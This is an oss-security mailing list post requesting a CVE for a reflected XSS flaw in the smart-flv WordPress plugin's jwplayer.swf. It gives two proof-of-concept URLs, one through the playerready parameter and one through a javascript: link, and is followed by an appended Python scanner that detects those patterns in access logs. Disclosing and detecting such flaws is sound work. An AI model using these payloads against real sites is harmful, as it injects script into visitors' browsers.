Message-ID: <20130224222359.GD23337@kludge.henri.nerv.fi>
Date: Mon, 25 Feb 2013 00:23:59 +0200
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: plugins@...dpress.org
Subject: CVE request: WordPress plugin smart-flv jwplayer.swf XSS

Hello list,

With wpscan-team I noticed that file jwplayer.swf in WordPress plugin smart-flv is vulnerable to a reflected XSS vulnerability.

URL: http://wordpress.org/extend/plugins/smart-flv/

416d0313c5f286c3a8e9daff520a9f44439b93f7  http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf

With user interaction (clicking the page):
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link

No interaction:
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29

WordPress guys, could you report this to the developer since I don't know his/her email address, thanks? Could you also tell me if there is a way to contact plugin developers directly, thank you.

Please include the CVE in the changelog if possible.

-- 
Henri Salo

ps. http://paste.nerv.fi/36167527-horse.jpeg
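A defender-side addition that is not part of Henri's post: a small log scanner that flags requests for the plugin's jwplayer.swf carrying the two parameter patterns the report describes (a `playerready` callback, or a `link` value using a `javascript:` URI), so a site operator can check access logs while waiting for a fixed plugin. It assumes Apache/nginx "combined" log format; the log lines below are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client, ident, user, [timestamp], "METHOD path PROTO", status, ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def is_suspicious_jwplayer_request(path):
    """Return a reason string if the request path matches the advisory's
    patterns, else None.  parse_qs percent-decodes values for us, so the
    encoded alert%28...%29 payloads in the report are compared decoded."""
    parts = urlsplit(path)
    if not parts.path.lower().endswith('/jwplayer.swf'):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    # Zero-interaction vector: the playerready callback parameter.
    if 'playerready' in params:
        return 'playerready callback supplied'
    # Click-to-trigger vector: link= pointing at a javascript: URI.
    for value in params.get('link', []):
        if value.lstrip().lower().startswith('javascript:'):
            return 'javascript: URI in link parameter'
    return None

def scan_log(lines):
    """Yield (client, path, reason) for every line that matches a pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, _ts, _method, path, _status = m.groups()
        reason = is_suspicious_jwplayer_request(path)
        if reason:
            hits.append((client, path, reason))
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Feb/2013:00:10:01 +0200] "GET /wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4 HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Feb/2013:00:11:15 +0200] "GET /wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29 HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Feb/2013:00:12:42 +0200] "GET /wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Feb/2013:00:13:00 +0200] "GET /wp-content/plugins/smart-flv/readme.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for client, path, reason in scan_log(SAMPLE_LOG):
        print(f'{client}\t{reason}\t{path}')
```

The plain `file=1.mp4` request is not flagged, so legitimate embeds of the player do not show up as hits; a real deployment would feed the function the server's own access log instead of SAMPLE_LOG.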